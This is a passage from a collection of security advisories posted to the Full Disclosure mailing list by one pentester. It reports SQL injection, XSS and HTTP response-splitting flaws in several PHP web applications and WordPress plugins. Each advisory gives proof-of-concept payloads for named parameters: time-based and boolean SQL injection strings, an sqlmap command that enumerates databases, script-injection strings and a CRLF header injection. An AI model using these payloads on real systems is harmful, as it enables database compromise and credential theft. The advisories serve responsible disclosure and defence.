August 12, 2017 4: Send to the Full-Disclosure lists

XII. LEGAL NOTICES
-
The information contained within this advisory is supplied "as-is" with no
warranties or guarantees of fitness of use or otherwise.

XIII. ABOUT
-----
Manuel Garcia Cardenas
Pentester

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

[FD] WordPress Plugin Spider Event Calendar 1.5.51 - Blind SQL Injection

2017-04-09 Thread Manuel Garcia Cardenas
=
MGC ALERT 2017-003
- Original release date: April 06, 2017
- Last revised:  April 10, 2017
- Discovered by: Manuel García Cárdenas
- Severity: 7,1/10 (CVSS Base Score)
=

I. VULNERABILITY
-
WordPress Plugin Spider Event Calendar 1.5.51 - Blind SQL Injection

II. BACKGROUND
-
WordPress event calendar is a FREE user-friendly responsive plugin to
manage multiple recurring events and with various options.

III. DESCRIPTION
-
This bug was found using the portal in the files:

/spider-event-calendar/calendar_functions.php:  if
(isset($_POST['order_by'])) {
/spider-event-calendar/widget_Theme_functions.php:if
(isset($_POST['order_by']) && $_POST['order_by'] != '') {

And when the query is executed, the parameter "order_by" it is not
sanitized:

/spider-event-calendar/front_end/frontend_functions.php:  $rows =
$wpdb->get_results($query." ".$order_by);

To exploit the vulnerability only is needed use the version 1.0 of the HTTP
protocol to interact with the application.

It is possible to inject SQL code.

IV. PROOF OF CONCEPT
-
The following URL have been confirmed to all suffer from Time Based SQL
Injection.

Time Based SQL Injection POC:

POST /wordpress/wp-admin/admin.php?page=SpiderCalendar HTTP/1.1

search_events_by_title=_number=1_or_not=_sp_cal=1e91ab0f6b&_wp_http_referer=%2Fwordpress%2Fwp-admin%2Fadmin.php%3Fpage%3DSpiderCalendar_for_playlist=_or_desc=1_by=id%2c(select*from(select(sleep(2)))a)
(2 seconds of response)

search_events_by_title=_number=1_or_not=_sp_cal=1e91ab0f6b&_wp_http_referer=%2Fwordpress%2Fwp-admin%2Fadmin.php%3Fpage%3DSpiderCalendar_for_playlist=_or_desc=1_by=id%2c(select*from(select(sleep(30)))a)
(30 seconds of response)

V. BUSINESS IMPACT
-
Public defacement, confidential data leakage, and database server
compromise can result from these attacks. Client systems can also be
targeted, and complete compromise of these client systems is also possible.

VI. SYSTEMS AFFECTED
-
Spider Event Calendar <= 1.5.51

VII. SOLUTION
-
Vendor release a new version.
https://downloads.wordpress.org/plugin/spider-event-calendar.1.5.52.zip

VIII. REFERENCES
-
https://es.wordpress.org/plugins/spider-event-calendar/

IX. CREDITS
-
This vulnerability has been discovered and reported
by Manuel García Cárdenas (advidsec (at) gmail (dot) com).

X. REVISION HISTORY
-
April 06, 2017 1: Initial release
April 10, 2017 2: Revision to send to lists

XI. DISCLOSURE TIMELINE
-
April 06, 2017 1: Vulnerability acquired by Manuel Garcia Cardenas
April 06, 2017 2: Send to vendor
April 07, 2017 3: Vendor fix the vulnerability and release a new version
April 10, 2017 4: Send to the Full-Disclosure lists

XII. LEGAL NOTICES
-
The information contained within this advisory is supplied "as-is" with no
warranties or guarantees of fitness of use or otherwise.

XIII. ABOUT
-
Manuel Garcia Cardenas
Pentester

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

[FD] WordPress Plugin Kama Click Counter 3.4.9 - Blind SQL Injection

2017-02-27 Thread Manuel Garcia Cardenas
=
MGC ALERT 2017-002
- Original release date: February 21, 2017
- Last revised:  February 28, 2017
- Discovered by: Manuel García Cárdenas
- Severity: 7,1/10 (CVSS Base Score)
=

I. VULNERABILITY
-
WordPress Plugin Kama Click Counter 3.4.9 - Blind SQL Injection

II. BACKGROUND
-
Using this plugin you will have statistics on clicks on your files or any
other link (not file).

III. DESCRIPTION
-
This bug was found using the portal in the
/wp-content/plugins/kama-clic-counter/admin.php file.

In the line 172,173 do not sanitize the input values.

$order_by = ($x= & $_GET['order_by']) ? esc_sql($x) : 'link_date';
$order= ($x= & $_GET['order']) ? esc_sql($x) : 'DESC';

And in the line 182 or 186 the sql sentence is executed:

$sql = "SELECT * FROM $wpdb->kcc_clicks WHERE link_url LIKE '%$s%' OR
link_name LIKE '%$s%' ORDER BY $order_by $order LIMIT $offset, $limit";
$sql = "SELECT * FROM $wpdb->kcc_clicks ORDER BY $order_by $order LIMIT
$offset, $limit";

To exploit the vulnerability only is needed use the version 1.0 of the HTTP
protocol to interact with the application.

It is possible to inject SQL code.

IV. PROOF OF CONCEPT
-
The following URL have been confirmed to all suffer from Time Based SQL
Injection.

Time Based SQL Injection POC:

/wordpress/wp-admin/admin.php?page=kama-clic-counter_by=link_name=ASC%2c(select*from(select(sleep(2)))a)=1
(2 seconds of response)

/wordpress/wp-admin/admin.php?page=kama-clic-counter_by=link_name=ASC%2c(select*from(select(sleep(30)))a)=1
(30 seconds of response)

V. BUSINESS IMPACT
-
Public defacement, confidential data leakage, and database server
compromise can result from these attacks. Client systems can also be
targeted, and complete compromise of these client systems is also possible.

VI. SYSTEMS AFFECTED
-
Kama Click Counter <= 3.4.9

VII. SOLUTION
-
Disable the plugin until a fix is available.

VIII. REFERENCES
-
https://wordpress.org/plugins-wp/kama-clic-counter/

IX. CREDITS
-
This vulnerability has been discovered and reported
by Manuel García Cárdenas (advidsec (at) gmail (dot) com).

X. REVISION HISTORY
-
February 21, 2017 1: Initial release
February 28, 2017 2: Revision to send to lists

XI. DISCLOSURE TIMELINE
-
February 21, 2017 1: Vulnerability acquired by Manuel Garcia Cardenas
February 21, 2017 2: Send to vendor
February 24, 2017 3: New contact with vendor without response
February 28, 2017 4: Send to the Full-Disclosure lists

XII. LEGAL NOTICES
-
The information contained within this advisory is supplied "as-is" with no
warranties or guarantees of fitness of use or otherwise.

XIII. ABOUT
-
Manuel Garcia Cardenas
Pentester

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

[FD] WordPress Plugin Easy Table 1.6 - Persistent Cross-Site Scripting

2017-02-14 Thread Manuel Garcia Cardenas
=
MGC ALERT 2017-001
- Original release date: Feb 07, 2017
- Last revised:  Feb 12, 2017
- Discovered by: Manuel Garcia Cardenas
- Severity: 4,8/10 (CVSS Base Score)
=

I. VULNERABILITY
-
WordPress Plugin Easy Table 1.6 - Persistent Cross-Site Scripting

II. BACKGROUND
-
Easy Table is a WordPress plugin that allow you to insert table in easy way.

III. DESCRIPTION
-
Has been detected a Persistent XSS vulnerability in Easy Table, that allows
the execution of arbitrary HTML/script code to be executed in the context
of the victim user's browser.

IV. PROOF OF CONCEPT
-
Malicious Request:
/wordpress/wp-admin/options-general.php?page=easy-table

easy_table_plugin_option[shortcodetag]
easy_table_plugin_option[attrtag]
easy_table_plugin_option[class]
easy_table_plugin_option[width]
easy_table_plugin_option[border]
easy_table_plugin_option[align]
easy_table_plugin_option[limit]
easy_table_plugin_option[nl]
easy_table_plugin_option[terminator]
easy_table_plugin_option[delimiter]
easy_table_plugin_option[escape]

In all of this parameters an attacker can inject for example
">alert(1) to perform a attack of Persistent Cross-Site
Scripting.

V. BUSINESS IMPACT
-
An attacker can execute arbitrary HTML or script code in a targeted user's
browser, this can leverage to steal sensitive information as user
credentials, personal data, etc.

VI. SYSTEMS AFFECTED
-
Easy Table <= 1.6

VII. SOLUTION
-
Disable the plugin until a fix is available.

VIII. REFERENCES
-
https://wordpress.org/plugins-wp/easy-table/

IX. CREDITS
-
This vulnerability has been discovered and reported
by Manuel Garcia Cardenas (advidsec (at) gmail (dot) com).

X. REVISION HISTORY
-
Feb 07, 2017 1: Initial release
Feb 12, 2017 2: Last revision

XI. DISCLOSURE TIMELINE
-
Feb 07, 2017 1: Vulnerability acquired by Manuel Garcia Cardenas
Feb 07, 2017 2: Send to vendor
Feb 09, 2017 3: New contact with vendor without response
Feb 12, 2017 4: Sent to lists

XII. LEGAL NOTICES
-
The information contained within this advisory is supplied "as-is" with no
warranties or guarantees of fitness of use or otherwise.

XIII. ABOUT
---------
Manuel Garcia Cardenas
Pentester

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/


[FD] Blind SQL Injection PivotX <= v2.3.11

2016-07-15 Thread Manuel Garcia Cardenas
=
MGC ALERT 2016-003
- Original release date: April 14, 2016
- Last revised:  July 14, 2016
- Discovered by: Manuel García Cárdenas
- Severity: 7,1/10 (CVSS Base Score)
=

I. VULNERABILITY
-
Blind SQL Injection PivotX <= v2.3.11

II. BACKGROUND
-
PivotX is an open source blog software written in PHP using either flat
files or a database to store content. It uses the Smarty web template
system and the TinyMCE editor.

III. DESCRIPTION
-
This bug was found using the portal with authentication as administrator.

To exploit the vulnerability only is needed use the version 1.0 of the HTTP
protocol to interact with the application.

It is possible to inject SQL code in the variable "del" on the page
"/pivotx/pivotx/index.php".

IV. PROOF OF CONCEPT
-
The following URL's and parameters have been confirmed to all suffer from
Blind SQL injection.

/pivotx/pivotx/index.php?page=comments=1=1+AND+1=1

/pivotx/pivotx/index.php?page=comments=1=1+AND+1=0

V. BUSINESS IMPACT
-
Public defacement, confidential data leakage, and database server
compromise can result from these attacks. Client systems can also be
targeted, and complete compromise of these client systems is also possible.

VI. SYSTEMS AFFECTED
-
PivotX <= v2.3.11

VII. SOLUTION
-
Vendor fix the vulnerability:
https://sourceforge.net/p/pivot-weblog/code/4474/

VIII. REFERENCES
-
http://pivotx.net/

IX. CREDITS
-
This vulnerability has been discovered and reported
by Manuel García Cárdenas (advidsec (at) gmail (dot) com).

X. REVISION HISTORY
-
April 14, 2016 1: Initial release
April 22, 2016 2: Revision to send to lists

XI. DISCLOSURE TIMELINE
-
April 14, 2016 1: Vulnerability acquired by Manuel Garcia Cardenas
April 14, 2016 2: Send to vendor
April 26, 2016 3: Vendor fix vulnerability
July 14, 2016 4: Send to the Full-Disclosure lists

XII. LEGAL NOTICES
-
The information contained within this advisory is supplied "as-is" with no
warranties or guarantees of fitness of use or otherwise.

XIII. ABOUT
-----
Manuel Garcia Cardenas
Pentester

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

[FD] XSS in CMSimple <= v4.6.2

2016-06-01 Thread Manuel Garcia Cardenas
=
MGC ALERT 2016-004
- Original release date: May 28, 2016
- Last revised:  June 1, 2016
- Discovered by: Manuel Garcia Cardenas
- Severity: 4,8/10 (CVSS Base Score)
=

I. VULNERABILITY
-
Reflected XSS in CMSimple <= v4.6.2

II. BACKGROUND
-
CMSimple is a php based Content Managemant System (CMS) , which requires no
database. All data are stored in a simple file system.

III. DESCRIPTION
-
Has been detected a reflected XSS vulnerability in Admin Panel of CMSimple,
that allows the execution of arbitrary HTML/script code to be executed in
the context of the victim user's browser.

The code injection is done through the parameter "subdir" in the page
"userfiles".

IV. PROOF OF CONCEPT
-
Malicious Request:
/cmsimple/?userfiles=userfiles/

Example:
/cmsimple/?userfiles=userfiles/alert(1)

V. BUSINESS IMPACT
-
An attacker can execute arbitrary HTML or script code in a targeted user's
browser, this can leverage to steal sensitive information as user
credentials, personal data, etc.

VI. SYSTEMS AFFECTED
-
CMSimple <= v4.6.2

VII. SOLUTION
-
Update to version 4.6.3

VIII. REFERENCES
-
http://www.cmsimple.org/

IX. CREDITS
-
This vulnerability has been discovered and reported
by Manuel Garcia Cardenas (advidsec (at) gmail (dot) com).

X. REVISION HISTORY
-
May 28, 2016 1: Initial release
June 1, 2016 2: Last revision

XI. DISCLOSURE TIMELINE
-
May 28, 2016 1: Vulnerability acquired by Manuel Garcia Cardenas
May 28, 2016 2: Send to vendor
May 30, 2016 3: New version that includes patched code
http://cmsimple.org/downloadcounter/dlcount/count.php?id=31
June 1, 2016 4: Sent to lists

XII. LEGAL NOTICES
-
The information contained within this advisory is supplied "as-is" with no
warranties or guarantees of fitness of use or otherwise.

XIII. ABOUT
-----
Manuel Garcia Cardenas
Pentester

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/


[FD] Time-based SQL Injection in Admin panel ImpressCMS <= v1.3.9

2016-04-21 Thread Manuel Garcia Cardenas
=
MGC ALERT 2016-002
- Original release date: April 8, 2016
- Last revised:  April 21, 2016
- Discovered by: Manuel García Cárdenas
- Severity: 7,1/10 (CVSS Base Score)
=

I. VULNERABILITY
-
Time-based SQL Injection in Admin panel ImpressCMS <= v1.3.9

II. BACKGROUND
-
ImpressCMS is a community developed Content Management System for easily
building and maintaining a dynamic web site.

III. DESCRIPTION
-
This bug was found using the portal with authentication as administrator.
To exploit the vulnerability only is needed use the version 1.0 of the HTTP
protocol to interact with the application.

It is possible to inject SQL code in the variable
"quicksearch_mod_profile_Field" on the page
"/modules/profile/admin/field.php".

IV. PROOF OF CONCEPT
-
The following URL's and parameters have been confirmed to all suffer from
Time Based Blind SQL injection.

quicksearch_mod_profile_Field=') AND (SELECT * FROM
(SELECT(SLEEP(1)))IRLV) AND ('DhUh' LIKE
'DhUh_quicksearch_mod_profile_Field=Search=default=15

quicksearch_mod_profile_Field=') AND (SELECT * FROM
(SELECT(SLEEP(5)))IRLV) AND ('DhUh' LIKE
'DhUh_quicksearch_mod_profile_Field=Search=default=15

V. BUSINESS IMPACT
-
Public defacement, confidential data leakage, and database server
compromise can result from these attacks. Client systems can also be
targeted, and complete compromise of these client systems is also possible.

VI. SYSTEMS AFFECTED
-
ImpressCMS <= v1.3.9

VII. SOLUTION
-
Install vendor patch.

VIII. REFERENCES
-
http://www.impresscms.org/

IX. CREDITS
-
This vulnerability has been discovered and reported
by Manuel García Cárdenas (advidsec (at) gmail (dot) com).

X. REVISION HISTORY
-
April 8, 2016 1: Initial release
April 21, 2016 2: Revision to send to lists

XI. DISCLOSURE TIMELINE
-
April 8, 2016 1: Vulnerability acquired by Manuel Garcia Cardenas
April 8, 2016 2: Send to vendor
April 15, 2016 3: New contact to vendor with no response
April 21, 2016 4: Send to the Full-Disclosure lists

XII. LEGAL NOTICES
-
The information contained within this advisory is supplied "as-is" with no
warranties or guarantees of fitness of use or otherwise.

XIII. ABOUT
-----
Manuel Garcia Cardenas
Pentester

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

[FD] Time-based SQL Injection in Admin panel UliCMS <= v9.8.1

2016-02-03 Thread Manuel Garcia Cardenas
=
MGC ALERT 2016-001
- Original release date: January 26, 2016
- Last revised:  February 02, 2016
- Discovered by: Manuel García Cárdenas
- Severity: 7,1/10 (CVSS Base Score)
=

I. VULNERABILITY
-
Time-based SQL Injection in Admin panel UliCMS <= v9.8.1

II. BACKGROUND
-
UliCMS is a modern web content management solution from Germany, that
attempts to make web content management more easier.

III. DESCRIPTION
-
This bug was found using the portal with authentication as administrator.
To exploit the vulnerability only is needed use the version 1.0 of the HTTP
protocol to interact with the application.

It is possible to inject SQL code in the variable "country_blacklist" on
the page "action=spam_filter".

IV. PROOF OF CONCEPT
-
The following URL's and parameters have been confirmed to all suffer from
Time Based Blind SQL injection.

/ulicms/admin/?action=spam_filter

(POST)
spamfilter_enabled=yes_words_blacklist=a_blacklist=ru_spamfilter_settings=Save+Changes

POC using SQLMap:

sqlmap -u "http://127.0.0.1/ulicms/admin/?action=spam_filter; --cookie="SET
COOKIE HERE"
--data="spamfilter_enabled=yes_words_blacklist=a_blacklist=ru_spamfilter_settings=Save+Changes"
-p "country_blacklist" --dbms="mysql" --dbs

V. BUSINESS IMPACT
-
Public defacement, confidential data leakage, and database server
compromise can result from these attacks. Client systems can also be
targeted, and complete compromise of these client systems is also possible.

VI. SYSTEMS AFFECTED
-
UliCMS <= v9.8.1

VII. SOLUTION
-
Install vendor patch.

VIII. REFERENCES
-
http://en.ulicms.de/

IX. CREDITS
-
This vulnerability has been discovered and reported
by Manuel García Cárdenas (advidsec (at) gmail (dot) com).

X. REVISION HISTORY
-
January 26, 2016 1: Initial release
February 02, 2015 2: Revision to send to lists

XI. DISCLOSURE TIMELINE
---------
January 26, 2016 1: Vulnerability acquired by Manuel Garcia Cardenas
January 26, 2016 2: Send to vendor
January 28, 2016 3: Vendor fix vulnerability
February 02, 2016 4: Send to the Full-Disclosure lists

XII. LEGAL NOTICES
-
The information contained within this advisory is supplied "as-is" with no
warranties or guarantees of fitness of use or otherwise.

XIII. ABOUT
-
Manuel Garcia Cardenas
Pentester

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

[FD] Blind SQL Injection in admin panel PHP-Fusion <= v7.02.07

2015-10-05 Thread Manuel Garcia Cardenas
=
MGC ALERT 2015-002
- Original release date: September 18, 2015
- Last revised:  October 05, 2015
- Discovered by: Manuel García Cárdenas
- Severity: 7,1/10 (CVSS Base Score)
=

I. VULNERABILITY
-
Blind SQL Injection in admin panel PHP-Fusion <= v7.02.07

II. BACKGROUND
-
PHP-Fusion is a lightweight open source content management system (CMS)
written in PHP.

III. DESCRIPTION
-
This bug was found using the portal with authentication as administrator.
To exploit the vulnerability only is needed use the version 1.0 of the HTTP
protocol to interact with the application. It is possible to inject SQL
code in the variable "status" on the page "members.php".

IV. PROOF OF CONCEPT
-
The following URL's and parameters have been confirmed to all suffer from
Blind SQL injection.

/phpfusion/files/administration/members.php?aid=99ad64700ec4ce10=all=0

Exploiting with true request (with mysql5):

/phpfusion/files/administration/members.php?aid=99ad64700ec4ce10=all=0'
AND substr(@@version,1,1)='5

Exploiting with false request:

/phpfusion/files/administration/members.php?aid=99ad64700ec4ce10=all=0'
AND substr(@@version,1,1)='4

V. BUSINESS IMPACT
-
Public defacement, confidential data leakage, and database server
compromise can result from these attacks. Client systems can also be
targeted, and complete compromise of these client systems is also possible.

VI. SYSTEMS AFFECTED
-
PHP-Fusion <= v7.02.07

VII. SOLUTION
-
All data received by the application and can be modified by the user,
before making any kind of transaction with them must be validated.

VIII. REFERENCES
-
https://www.php-fusion.co.uk/

IX. CREDITS
-
This vulnerability has been discovered and reported
by Manuel García Cárdenas (advidsec (at) gmail (dot) com).

X. REVISION HISTORY
-
September 18, 2015 1: Initial release
October 10, 2015 2: Revision to send to lists

XI. DISCLOSURE TIMELINE
-
September 18, 2015 1: Vulnerability acquired by Manuel Garcia Cardenas
September 18, 2015 2: Send to vendor
September 24, 2015 3: Second mail to the verdor without response
October   10, 2015 4: Send to the Full-Disclosure lists

XII. LEGAL NOTICES
-
The information contained within this advisory is supplied "as-is" with no
warranties or guarantees of fitness of use or otherwise.

XIII. ABOUT
-----
Manuel Garcia Cardenas
Pentester

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

[FD] Stored XSS in 4images <= v1.7.11

2015-09-25 Thread Manuel Garcia Cardenas
=
MGC ALERT 2015-001
- Original release date: September 08, 2015
- Last revised:  September 24, 2015
- Discovered by: Manuel Garcia Cardenas
- Severity: 4,8/10 (CVSS Base Score)
=

I. VULNERABILITY
-
Stored XSS in 4images <= v1.7.11

II. BACKGROUND
-
4images is a powerful web-based image gallery management system. Features
include comment system, user registration and management, password
protected administration area with browser-based upload and HTML templates
for page layout and design.

III. DESCRIPTION
-
Has been detected a stored XSS vulnerability in 4images, that allows the
execution of arbitrary HTML/script code to be executed in the context of
the victim user's browser.

The code injection is done through the parameter warning in the page
categories.php parameters "cat_description".

IV. PROOF OF CONCEPT
-
Malicious Request:
http://vulnerablesite.com/4images/admin/categories.php
__csrf==updatecat_id=1_name=example_description=_parent_id=0_order=5_hits=2285_viewcat=0_viewimage=0_download=2_upload=2_directupload=9_vote=0_sendpostcard=0_readcomment=0_postcomment=2

Example:
http://vulnerablesite.com/4images/categories.php?cat_id=1

V. BUSINESS IMPACT
-
An attacker can execute arbitrary HTML or script code in a targeted user's
browser, this can leverage to steal sensitive information as user
credentials, personal data, etc.

VI. SYSTEMS AFFECTED
-
4images <= v1.7.11

VII. SOLUTION
-
Update to the last version.

VIII. REFERENCES
-
http://www.4homepages.de/

IX. CREDITS
-
This vulnerability has been discovered and reported
by Manuel Garcia Cardenas (advidsec (at) gmail (dot) com).

X. REVISION HISTORY
-
September 08, 2015 1: Initial release
September 24, 2015 2: Last revision

XI. DISCLOSURE TIMELINE
-
September 08, 2015 1: Vulnerability acquired by Manuel Garcia Cardenas
September 08, 2015 2: Send to vendor
September 24, 2015 3: Sent to lists

XII. LEGAL NOTICES
-
The information contained within this advisory is supplied "as-is" with no
warranties or guarantees of fitness of use or otherwise.

XIII. ABOUT
---------
Manuel Garcia Cardenas
Pentester

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/


[FD] WebsiteBaker =2.8.3 - Multiple Vulnerabilities

2014-11-17 Thread Manuel Garcia Cardenas
=
MGC ALERT 2014-004
- Original release date: March 11, 2014
- Last revised:  November 18, 2014
- Discovered by: Manuel Garcia Cardenas
- Severity: 10/10 (CVSS Base Score)
=

I. VULNERABILITY
-
Multiple Vulnerabilities in WebsiteBaker 2.8.3

II. BACKGROUND
-
WebsiteBaker helps you to create the website you want: A free, easy and
secure, flexible and extensible open source content management system (CMS).

III. DESCRIPTION
-
It is possible to inject SQL code in the variable id on the page
modify.php. This bug was found using the portal without authentication.
To exploit the vulnerability only is needed use the version 1.0 of the HTTP
protocol to interact with the application.
Has been detected a reflected XSS vulnerability in WebsiteBaker, that
allows the execution of arbitrary HTML/script code to be executed in the
context of the victim user's browser.
An input validation problem exists within WebsiteBaker which allows
injecting CR (carriage return - %0D or \r) and LF (line feed - %0A or \n)
characters into the server HTTP response header, resulting in a HTTP
Response Splitting Vulnerability.

IV. PROOF OF CONCEPT
-
SQL Injection:

/wb/admin/pages/modify.php?page_id=1

Cross-Site Scripting GET:

/wb/admin/admintools/tool.php?tool=captcha_control6d442scriptalert(1)/script8e3b12642a8=1
/wb/modules/edit_module_files.php?page_id=1mod_dir=newsedit_file=frontend.cssaction=editpage_id=1section_id=%007e393scriptalert(1)/script9f8a40a7355f9acf0
/wb/modules/news/add_post.php?page_id=1section_id=f953ascriptalert(1)/script4ddf3369c1f
/wb/modules/news/modify_group.php?page_id=1section_id=%008cf03scriptalert(1)/script2680504c3ecgroup_id=62be99873b33d1d3
/wb/modules/news/modify_post.php?page_id=1section_id=%003874ascriptalert(1)/script4194d511605post_id=db89943875a2db52
/wb/modules/news/modify_settings.php?page_id=1section_id=%008b2f4scriptalert(1)/scriptbdc8b3919b5

HTTP RESPONSE SPLITTING:

If you enter a valid user and password, you can inject on the headers
malicious code, example.

POST /wb/admin/login/index.php HTTP/1.1
Content-Length: 204
Content-Type: application/x-www-form-urlencoded
Referer: http://192.168.244.129:80/wb/
Host: 127.0.0.1
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML,
like Gecko) Chrome/28.0.1500.63 Safari/537.36
Accept: */*

password_fieldname=password_nwh1uuwbpassword_nwh1uuwb=VALIDPASSremember=truesubmit=Entrar
url=%0d%0a%20InjectedHeader:MaliciousCodeusername_fieldname=username_nwh1uuwbusername_nwh1uuwb=adminResponse

You can inject a new header named: InjectedHeader:MaliciousCode because we
inject a CRLF new line with %0d%0a%20.

V. BUSINESS IMPACT
-
Public defacement, confidential data leakage, and database server
compromise can result from these attacks. Client systems can also be
targeted, and complete compromise of these client systems is also possible.

VI. SYSTEMS AFFECTED
-
WebsiteBaker = 2.8.3

VII. SOLUTION
-
No news releases

VIII. REFERENCES
-
http://www.websitebaker.org

IX. CREDITS
-
This vulnerability has been discovered and reported
by Manuel Garcia Cardenas (advidsec (at) gmail (dot) com).

X. REVISION HISTORY
-
March 11, 2014 1: Initial release

XI. DISCLOSURE TIMELINE
-
March 11, 2014 1: Vulnerability acquired by Manuel Garcia Cardenas
March 11, 2014 2: Send to vendor
June 05, 2014 3: Second mail to the verdor without response
November 18, 2014 4: Sent to lists

XII. LEGAL NOTICES
-
The information contained within this advisory is supplied as-is with no
warranties or guarantees of fitness of use or otherwise.

XIII. ABOUT
-
Manuel Garcia Cardenas
Pentester

___
Sent through the Full Disclosure mailing list
http://nmap.org/mailman/listinfo/fulldisclosure
Web Archives  RSS: http://seclists.org/fulldisclosure/


[FD] Zoph = 0.9.1 - Multiple Vulnerabilities

2014-11-17 Thread Manuel Garcia Cardenas
=
MGC ALERT 2014-005
- Original release date: March 5, 2014
- Last revised:  November 18, 2014
- Discovered by: Manuel Garcia Cardenas
- Severity: 10/10 (CVSS Base Score)
=

I. VULNERABILITY
-
Multiple Vulnerabilities in Zoph = 0.9.1

II. BACKGROUND
-
Zoph (Zoph Organizes Photos) is a web based digital image presentation and
management system. In other words, a photo album. It is built with PHP,
MySQL and Perl.

III. DESCRIPTION
-
It is possible to inject SQL code in the variables id and action on the
pages group, photos and user. This bug was found using the portal with
authentication. To exploit the vulnerability only is needed use the version
1.0 of the HTTP protocol to interact with the application.
Has been detected a reflected XSS vulnerability in Zoph, that allows the
execution of arbitrary HTML/script code to be executed in the context of
the victim user's browser.

IV. PROOF OF CONCEPT
-
SQL Injection:

/zoph/php/group.php?_action=1'%22_clear_crumbs=1
/zoph/php/photos.php?location_id=1'%22
/zoph/php/user.php?user_id=_action=1'%22

Cross-Site Scripting GET:

/zoph/php/edit_photos.php?photographer_id=3scriptalert(1)/script
/zoph/php/edit_photos.php?album_id=2_crumb=3scriptalert(1)/script

V. BUSINESS IMPACT
-
Public defacement, confidential data leakage, and database server
compromise can result from these attacks. Client systems can also be
targeted, and complete compromise of these client systems is also possible.

VI. SYSTEMS AFFECTED
-
Zoph = 0.9.1

VII. SOLUTION
-
No news releases

VIII. REFERENCES
-
http://www.zoph.org/

IX. CREDITS
-
This vulnerability has been discovered and reported
by Manuel Garcia Cardenas (advidsec (at) gmail (dot) com).

X. REVISION HISTORY
-
March 11, 2014 1: Initial release

XI. DISCLOSURE TIMELINE
-
March 5, 2014 1: Vulnerability acquired by Manuel Garcia Cardenas
March 5, 2014 2: Send to vendor
June 17, 2014 3: Second mail to the verdor without response
November 18, 2014 4: Sent to lists

XII. LEGAL NOTICES
-
The information contained within this advisory is supplied as-is with no
warranties or guarantees of fitness of use or otherwise.

XIII. ABOUT
-
Manuel Garcia Cardenas
Pentester

___
Sent through the Full Disclosure mailing list
http://nmap.org/mailman/listinfo/fulldisclosure
Web Archives  RSS: http://seclists.org/fulldisclosure/